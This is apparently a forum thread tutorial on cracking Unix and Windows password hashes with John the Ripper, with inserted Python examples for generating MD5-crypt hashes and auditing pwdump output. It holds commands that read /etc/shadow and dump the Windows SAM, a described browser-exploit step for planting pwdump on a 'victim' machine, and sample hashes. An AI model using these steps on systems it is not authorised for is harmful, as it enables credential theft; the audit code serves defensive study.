
Thread: How to break a unix or windows password with john

  1. #1
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    How to break a unix or windows password with john

    I've had a few PMs recently asking about password cracking. In the interest of legality I will be cracking my own today. Unix passwords are located in the /etc/shadow file or the /etc/passwd file.
    So put yourself in the directory of john

    Pureh@te ~ # cd /pentest/password/john-1.7.2/run

    Next, unix passwords are "shadowed" and we must "unshadow" them. John can do this with the unshadow command

    Pureh@te run # unshadow /etc/passwd /etc/shadow >passwd

    I have now written my "salted" unix password to a file called passwd.
    Now I simply point john to the file


    Pureh@te run # john passwd
    Loaded 1 password hash (FreeBSD MD5 [32/32])
    louisvillesucks (root)
    guesses: 1 time: 0:00:08:13 100% (2) c/s: 3758 trying: louisvillesucks

    A few things to note. This uses the default passlist that comes with john. If you have your own list you can either point john at your word list as an argument or you can edit the john.conf file to use your pass list. So it would look like this


    [Options]
    # Wordlist file name, to be used in batch mode
    Wordlist = $JOHN/password.lst
    # Use idle cycles only
    Idle = N
    # Crash recovery file saving delay in seconds
    Save = 600
    # Beep when a password is found (who needs this anyway?)
    Beep = N

    And I changed mine to this. Note the pass list must be in the john/run directory for this to work.


    [Options]
    # Wordlist file name, to be used in batch mode
    Wordlist = $JOHN/hatelist.txt
    # Use idle cycles only
    Idle = N
    # Crash recovery file saving delay in seconds
    Save = 600
    # Beep when a password is found (who needs this anyway?)
    Beep = N

    Hopefully this has been somewhat helpful to someone

  2. #2
    Just burned his ISO
    Join Date
    Oct 2006
    Posts
    24


    purehate that was excellent.
    it must have been fate!!! I've just been looking for this very thing.

    one of my fellow engineers left the company last week and didn't hand over the access list (password list) for our unix run HDD testers.

    I'll have a pop at this tomorrow..
    cheers.
    Wannabee Geek ... :cool:

  3. #3


    Thank you for posting this purehate.
    Definitely will be helpful
    15" MBP 8 gigs o ram 256 gig SSD in drivebay + 256 gig 5400 HD
    1000HE EEE 30 gig SSD 2 gigs Ram

  4. #4
    Senior Member PrairieFire's Avatar
    Join Date
    Apr 2007
    Posts
    705


    Nice write up,

    Might add how to create your own hashes to test your own password strength.

    Using OpenSSL:

    openssl passwd -1 mypassword

    Salted:

    openssl passwd -1 -salt asdfgqwe mypassword
    Μολὼν λαβέ - Great spirits encounter heavy opposition from mediocre minds.
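    The "salted" MD5 format that post #1 sees john report as FreeBSD MD5 and that `openssl passwd -1` produces is MD5-crypt, the `$1$salt$hash` scheme. The following is an added example, not code from the thread: a self-contained implementation of that algorithm so you can generate hashes of your own passwords, parse an /etc/shadow entry and verify a candidate against it offline. The helper names (`md5_crypt`, `verify`, `verify_shadow_line`, `cross_check_with_libc`) and the salt `saltsalt` are this example's own choices, not anything from the post.

```python
"""MD5-crypt ($1$) hashes: generate, parse from a shadow line, and verify.

Added example, not from the thread. Implements the algorithm behind
`openssl passwd -1` (the "FreeBSD MD5" format john reports), so you can make
hashes of your *own* passwords and confirm a candidate against an /etc/shadow
entry without any external tool. Function names are this example's own.
"""
import hashlib
import hmac
import os

MAGIC = b"$1$"
ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value, count):
    """crypt(3)-style base64: emits the least-significant 6 bits first."""
    out = bytearray()
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return bytes(out)


def md5_crypt(password, salt):
    """Return b'$1$<salt>$<22 chars>' for password/salt (bytes or str)."""
    pw = password.encode() if isinstance(password, str) else password
    salt = salt.encode() if isinstance(salt, str) else salt
    salt = salt[:8]  # the algorithm uses at most 8 salt bytes

    ctx = hashlib.md5(pw + MAGIC + salt)
    alt = hashlib.md5(pw + salt + pw).digest()
    # Mix in len(pw) bytes of the alternate sum, 16 at a time.
    for off in range(0, len(pw), 16):
        ctx.update(alt[: min(16, len(pw) - off)])
    # Walk the bits of the password length: NUL for a set bit, pw[0] otherwise.
    i = len(pw)
    while i:
        ctx.update(b"\0" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()

    # 1000 stretching rounds on a fixed, data-independent schedule.
    for i in range(1000):
        c = hashlib.md5()
        c.update(pw if i & 1 else final)
        if i % 3:
            c.update(salt)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()

    f = final
    encoded = b"".join([
        _to64((f[0] << 16) | (f[6] << 8) | f[12], 4),
        _to64((f[1] << 16) | (f[7] << 8) | f[13], 4),
        _to64((f[2] << 16) | (f[8] << 8) | f[14], 4),
        _to64((f[3] << 16) | (f[9] << 8) | f[15], 4),
        _to64((f[4] << 16) | (f[10] << 8) | f[5], 4),
        _to64(f[11], 2),
    ])
    return MAGIC + salt + b"$" + encoded


def new_hash(password, salt=None):
    """Hash with a fresh random 8-char salt, as `openssl passwd -1` does."""
    if salt is None:
        salt = bytes(ITOA64[b & 0x3F] for b in os.urandom(8))
    return md5_crypt(password, salt).decode()


def verify(password, hashed):
    """Constant-time check of a password against a $1$ hash string."""
    if isinstance(hashed, str):
        hashed = hashed.encode()
    parts = hashed.split(b"$")  # b'', b'1', salt, encoded digest
    if len(parts) != 4 or parts[1] != b"1":
        raise ValueError("not an MD5-crypt ($1$) hash")
    return hmac.compare_digest(md5_crypt(password, parts[2]), hashed)


def verify_shadow_line(line, password):
    """Return (user, matches) for one /etc/shadow line (user:hash:...)."""
    fields = line.strip().split(":")
    return fields[0], verify(password, fields[1])


def cross_check_with_libc(password="password", salt="saltsalt"):
    """Compare against the platform crypt(3) where Python still ships `crypt`
    (removed in 3.13) and libc supports $1$; returns None when unavailable."""
    try:
        import warnings
        with warnings.catch_warnings():
            warnings.simplefilter("ignore", DeprecationWarning)
            import crypt
    except ImportError:
        return None
    ref = crypt.crypt(password, "$1$" + salt + "$")
    if not ref or not ref.startswith("$1$" + salt + "$"):
        return None
    return ref == md5_crypt(password, salt).decode()


if __name__ == "__main__":
    h = new_hash("correct horse")
    print(h, verify("correct horse", h), verify("wrong", h))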

  5. #5
    Developer
    Join Date
    Mar 2007
    Posts
    6,124


    Quote Originally Posted by PrairieFire View Post
    Nice write up,

    Might add how to create your own hashes to test your own password strength.

    Using OpenSSL:

    openssl passwd -1 mypassword

    Salted:

    openssl passwd -1 -salt asdfgqwe mypassword
    This is why I love community. We can always help each other and it is free. Let's hold hands across the world and sing kum-by-yaaa

  6. #6
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385


    Nice one purehate! I ESPECIALLY was fond of your "hatelist", as in Wordlist = $JOHN/hatelist.txt. I've only used John in windows though. I might try this out to see if it's better under Linux. Have you tried John in Windows? (It uses the command prompt.) There's also a GUI for it available. But again, that's all under Windows.

  7. #7
    Senior Member PrairieFire's Avatar
    Join Date
    Apr 2007
    Posts
    705


    Seems faster in hdd install of BT2 for me even when using lots of parameters.
    Μολὼν λαβέ - Great spirits encounter heavy opposition from mediocre minds.

  8. #8
    Developer
    Join Date
    Mar 2007
    Posts
    6,124


    no I've never used john in windows. What I do is copy the backup of the sam file and load it into backtrack and crack it with john in backtrack. If anyone cares I can show how to do that as well.

  9. #9
    Just burned his ISO
    Join Date
    Mar 2007
    Posts
    8


    Quote Originally Posted by Pete* View Post
    one of my fellow engineers left the company last week and didn't hand over the access list (password list) for our unix run HDD testers.
    Umm... why not just set new passwords?

  10. #10
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    windows with john

    Here is the windows portion of this. I'm not going to go into how I broke into my windows machine but suffice to say I did this from a-z. So we use pwdump which is located in the windows binary directory under passwords. I uploaded this with metasploit using the ie create browser exploit. Note this vulnerability is patched but I used an unpatched version for this. Once the .exe is in place in the C:\ directory simply issue the command

    C:\pwdump \l \o: passwd

    This will dump the contents of the backup sam file to a file called passwd.

    Next I will copy that file from my victim machine to my superfly backtrack lappy. The file should resemble this:

    Administrator:500:183B986419E1ED9517306D272A9441BB:555A70434209AA0AB9621E26E6B083FF:::
    ANONYMOUS:1005:AAD3B435B51404EEAAD3B435B51404EE21FA29EE1E0694960CEAD1418BB9E6E:::
    ASPNET:1003:B1EB876CE14DC283594153934628466C:A1E5D931400FD77F6107A5D4050B4AF0:::
    Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
    HelpAssistant:1004:C5D763ABA2DE015BECD6D9DAC8AC1C1E:2C3D74B085F512AE054CD59EF3AB6D48:::
    LNSS_MONITOR_USR:1025:AAD3B435B51404EEAAD3B435B51404EE:28C80904F8896EB48DAD8FB18D45C63A:::
    SUPPORT_388945a0:1002:AAD3B435B51404EEAAD3B435B51404EE:FAF25868710610DE776AE4158D493FE2:::


    As you can see I have retrieved some useful hashes. Windows passwords are much easier to crack than unix because there are no "salts". Anyway, now point john at the passwd file just like in the unix example (note I placed the passwd file in the john/run directory to make for less typing). You should get something like this.

    Pureh@te run # john passwd
    Loaded 10 password hashes with no different salts (NT LM DES [32/32 BS])
    (SUPPORT_388945a0)
    (LNSS_MONITOR_USR)
    (Guest)
    (ANONYMOUS)
    E (Administrator:2)
    PUREHAT (Administrator:1)


    As you can see john was able to "crack" my admin password of pure hate fairly quickly. After john runs through the word list it will go into bruteforce mode to try to break your LM hashes. This could take days, even months or years I guess, depending on your patience and the strength of the password. If anyone has any questions or would like to see a specific tool demonstrated please feel free to post a request
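    The dump above contains two values every defender should recognise on sight: AAD3B435B51404EEAAD3B435B51404EE is the LM hash of an empty password (so accounts showing it have no LM hash to attack), and 31D6CFE0D16AE931B73C59D7E0C089C0 is the NT hash of an empty password (so the Guest line is a blank password). Because LM hashes each half of the password separately, a second half equal to AAD3B435B51404EE also reveals a password of 7 characters or fewer. The following is an added example, not code from the post: it parses `user:rid:LM:NT:::` lines in this layout and reports those weaknesses per account. The function names are this example's own; the sample dump is constructed (its first two lines mirror the post, `svc_short` and its hashes are invented placeholders).

```python
"""Audit a pwdump-style hash file for weak Windows password storage.

Added example, not code from the thread. Reads `user:rid:LM:NT:::` lines in
the layout the post pastes and reports, per account, whether an LM hash is
still stored, whether the password is 7 characters or fewer, and whether the
password is blank. The empty-password hash constants are well known; the
sample lines are constructed for this example (first two mirror the post).
"""
import re

# LM hash of the empty password: both halves are DES("KGS!@#$%") under an all-zero key.
LM_EMPTY_HALF = "AAD3B435B51404EE"
LM_EMPTY = LM_EMPTY_HALF * 2
# NT hash of the empty password: MD4 of the empty UTF-16LE string.
NT_EMPTY = "31D6CFE0D16AE931B73C59D7E0C089C0"

LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9A-Fa-f]{32}):([0-9A-Fa-f]{32}):")


def parse_pwdump_line(line):
    """Return {'user', 'rid', 'lm', 'nt'} or None for a line that does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    user, rid, lm, nt = m.groups()
    return {"user": user, "rid": int(rid), "lm": lm.upper(), "nt": nt.upper()}


def audit_account(rec):
    """List the weaknesses visible from one account's LM/NT hash pair."""
    findings = []
    if rec["nt"] == NT_EMPTY:
        findings.append("blank password")
    if rec["lm"] != LM_EMPTY:
        # LM is case-folded DES over two 7-byte halves: no salt, tiny keyspace.
        findings.append("LM hash stored")
        if rec["lm"][16:] == LM_EMPTY_HALF:
            # The second half equals the empty constant only when len(password) <= 7.
            findings.append("password is 7 characters or fewer")
    return findings


def audit_dump(text):
    """Map user -> findings; lines that do not parse are skipped, not guessed at."""
    report = {}
    for line in text.splitlines():
        rec = parse_pwdump_line(line)
        if rec is not None:
            report[rec["user"]] = audit_account(rec)
    return report


# Constructed sample: first two lines follow the post; 'svc_short' is invented
# (LM second half set to the empty constant, NT hash is a placeholder value).
SAMPLE_DUMP = """\
Administrator:500:183B986419E1ED9517306D272A9441BB:555A70434209AA0AB9621E26E6B083FF:::
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
svc_short:1010:0123456789ABCDEFAAD3B435B51404EE:00112233445566778899AABBCCDDEEFF:::
broken line that should be skipped
"""

if __name__ == "__main__":
    for user, findings in audit_dump(SAMPLE_DUMP).items():
        print(f"{user:15} {', '.join(findings) or 'no LM hash, non-blank password'}")
```

    On the post's own dump this flags Administrator, ASPNET and HelpAssistant as still having LM hashes (which is why john recovered the admin password in two 7-character halves) and Guest as blank. The fix on the Windows side is to stop storing LM hashes (the NoLMHash policy) and to disable or set passwords on the blank accounts, which removes the fast path the post demonstrates.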
